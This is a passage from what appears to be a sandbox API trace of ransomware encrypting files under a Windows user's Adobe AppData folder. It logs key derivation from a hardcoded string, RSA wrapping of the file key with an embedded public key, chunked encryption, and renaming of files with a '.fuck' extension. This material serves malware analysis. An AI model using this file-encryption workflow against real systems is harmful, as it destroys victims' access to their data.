pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.571] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0241.571] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f4e90) returned 1 [0241.572] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4e90, dwCertEncodingType=0x1, pInfo=0x2906ad8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906b08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906b10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7db8) returned 1 [0241.572] CryptEncrypt (in: hKey=0x28e7db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0241.572] CryptEncrypt (in: hKey=0x28e7db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3e18*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f3e18*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0241.572] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f3e18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f3e18*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0241.573] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.585] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.585] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.605] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x8b, lpOverlapped=0x0) returned 1 [0241.605] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x8b, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x90) returned 1 [0241.605] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x90, lpOverlapped=0x0) returned 1 [0241.605] CloseHandle (hObject=0x5d40) returned 1 [0241.606] CloseHandle (hObject=0x5d44) returned 1 [0241.608] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst"), bFailIfExists=0) returned 1 [0241.616] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst", dwFileAttributes=0x0) returned 1 [0241.617] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst.gsg")) returned 1 [0241.619] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt15.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt15.lst.fuck")) returned 1 [0241.620] CryptDestroyHash (hHash=0x28e82b8) returned 1 [0241.620] CryptDestroyKey (hKey=0x28e8078) returned 1 [0241.620] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.620] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.620] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0241.620] GetLastError () returned 0x0 [0241.621] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst")) returned 0x20 [0241.621] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst", dwFileAttributes=0x80) returned 1 [0241.622] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.623] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0241.623] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst.gsg", dwFileAttributes=0x2) returned 1 [0241.624] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0241.630] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0241.630] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.630] CryptHashData (hHash=0x28e8078, pbData=0x2856ed0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.630] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e7b78) returned 1 [0241.630] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.630] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0241.630] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f42e0) returned 1 [0241.631] CryptImportPublicKeyInfo (in: hCryptProv=0x28f42e0, dwCertEncodingType=0x1, pInfo=0x2906ba8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906bd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906be0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e8278) returned 1 [0241.631] CryptEncrypt (in: hKey=0x28e8278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0241.631] CryptEncrypt (in: hKey=0x28e8278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4c70*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f4c70*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0241.631] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f4c70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f4c70*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0241.632] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x218, lpOverlapped=0x0) returned 1 [0241.636] CryptEncrypt (in: hKey=0x28e7b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x218, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x220) returned 1 [0241.636] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x220, lpOverlapped=0x0) returned 1 [0241.648] CloseHandle (hObject=0x5d44) returned 1 [0241.648] CloseHandle (hObject=0x5d40) returned 1 [0241.649] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst"), bFailIfExists=0) returned 1 [0241.653] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst", dwFileAttributes=0x0) returned 1 [0241.653] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst.gsg")) returned 1 [0241.654] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeCMapFnt17.lst.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobecmapfnt17.lst.fuck")) returned 1 [0241.655] CryptDestroyHash (hHash=0x28e8078) returned 1 [0241.655] CryptDestroyKey (hKey=0x28e7b78) returned 1 [0241.655] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.655] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.655] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0241.656] GetLastError () returned 0x0 [0241.656] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst")) returned 0x20 [0241.656] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst", dwFileAttributes=0x80) returned 1 [0241.656] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0241.657] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\adobesysfnt15.lst.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0241.657] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\AdobeSysFnt15.lst.gsg", dwFileAttributes=0x2) returned 1 [0241.658] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0241.661] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0241.661] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.661] CryptHashData (hHash=0x28e7df8, pbData=0x2857268, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.661] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e82b8) returned 1 [0241.661] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.662] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0241.662] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f4720) returned 1 [0241.662] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4720, dwCertEncodingType=0x1, pInfo=0x2935ac0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935af0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935af8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7fb8) returned 1 [0241.662] CryptEncrypt (in: hKey=0x28e7fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0241.662] CryptEncrypt (in: hKey=0x28e7fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4b60*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f4b60*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0241.662] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f4b60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f4b60*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0241.663] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.670] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.670] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.684] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.684] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.684] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.684] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.685] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.685] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.685] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.685] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.685] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.685] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.686] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.686] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.686] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, 